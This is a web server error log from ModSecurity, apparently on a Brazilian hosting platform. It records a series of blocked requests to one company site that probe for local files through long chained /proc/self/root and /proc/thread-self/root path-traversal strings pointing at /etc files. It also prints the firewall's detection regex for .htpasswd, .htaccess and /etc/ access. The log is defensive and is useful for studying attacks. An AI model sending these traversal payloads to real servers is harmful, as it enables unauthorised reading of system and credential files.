[Thu Mar 19 05:03:37.644060 2026] [:error] [pid 17887:tid 140411607643904] [client 74.7.243.128:57562] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abut2QkwaGbbGflqUZCHVwAAANA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:03:47.527021 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.243.128:57576] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abut49a6ubjKNq_cu4YUDQAAA1g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:03:50.950972 2026] [:error] [pid 30077:tid 140411565680384] [client 74.7.243.128:36372] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abut5fu8EFLIOrSqIptv-wAAAlU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:03:52.416595 2026] [:error] [pid 17653:tid 140411624429312] [client 74.7.243.128:59774] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abut6Mdf6f5d65gmYZRE8wAAAs4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:03:54.775277 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.243.128:59786] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abut6uyqAr6etmhZHNo1EAAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:04:12.411048 2026] [:error] [pid 17887:tid 140411599251200] [client 74.7.243.128:59788] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abut_AkwaGbbGflqUZCHegAAANE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:04:21.972392 2026] [:error] [pid 14269:tid 140411666392832] [client 74.7.243.128:35854] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuuBQbLMZ6AikZjR9UvGAAAAAk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:04:32.851649 2026] [:error] [pid 27403:tid 140411574073088] [client 74.7.241.31:50124] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuuEBkFeYa1D6dYQnDAUwAAAdQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:04:36.306958 2026] [:error] [pid 27403:tid 140411683178240] [client 74.7.241.31:47160] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuuFBkFeYa1D6dYQnDAVQAAAcc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:04:39.426857 2026] [:error] [pid 30077:tid 140411590858496] [client 74.7.228.61:57078] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuuF_u8EFLIOrSqIptwKQAAAlI"]
[Thu Mar 19 05:05:11.298530 2026] [:error] [pid 19093:tid 140411616036608] [client 74.7.243.128:47238] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuuN1_V7PWP6ixUYl6NiwAAAo8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:05:13.137194 2026] [:error] [pid 30077:tid 140411540502272] [client 74.7.241.31:44554] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuuOfu8EFLIOrSqIptwVAAAAlg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:06:00.007743 2026] [:error] [pid 14269:tid 140411632822016] [client 74.7.243.128:39480] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuuaAbLMZ6AikZjR9UvXgAAAA0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:06:36.368747 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.243.128:37174] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuujNa6ubjKNq_cu4YUmQAAA1A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:06:48.240662 2026] [:error] [pid 30077:tid 140411616036608] [client 74.7.243.128:56224] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuumPu8EFLIOrSqIptwpgAAAk8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 05:06:59.699125 2026] [:error] [pid 27293:tid 140411716749056] [client 74.7.243.128:54950] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/csh.cshrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuuo_-YZRR_7pZ7nDJfLAAAA8M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:07:01.014919 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.243.128:57586] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuupfu8EFLIOrSqIptwsQAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:07:02.414176 2026] [:error] [pid 27403:tid 140411557287680] [client 74.7.243.128:57598] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuuphkFeYa1D6dYQnDAswAAAdY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:07:03.654316 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.243.128:57600] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuup9a6ubjKNq_cu4YUrAAAA0k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:07:04.959178 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.243.128:57604] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/resolv.conf.save"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuuqNa6ubjKNq_cu4YUrQAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:07:06.251276 2026] [:error] [pid 27403:tid 140411716749056] [client 74.7.243.128:57610] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuuqhkFeYa1D6dYQnDAtQAAAcM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:07:07.663272 2026] [:error] [pid 17653:tid 140411565680384] [client 74.7.243.128:57612] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuuq8df6f5d65gmYZRFRgAAAtU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
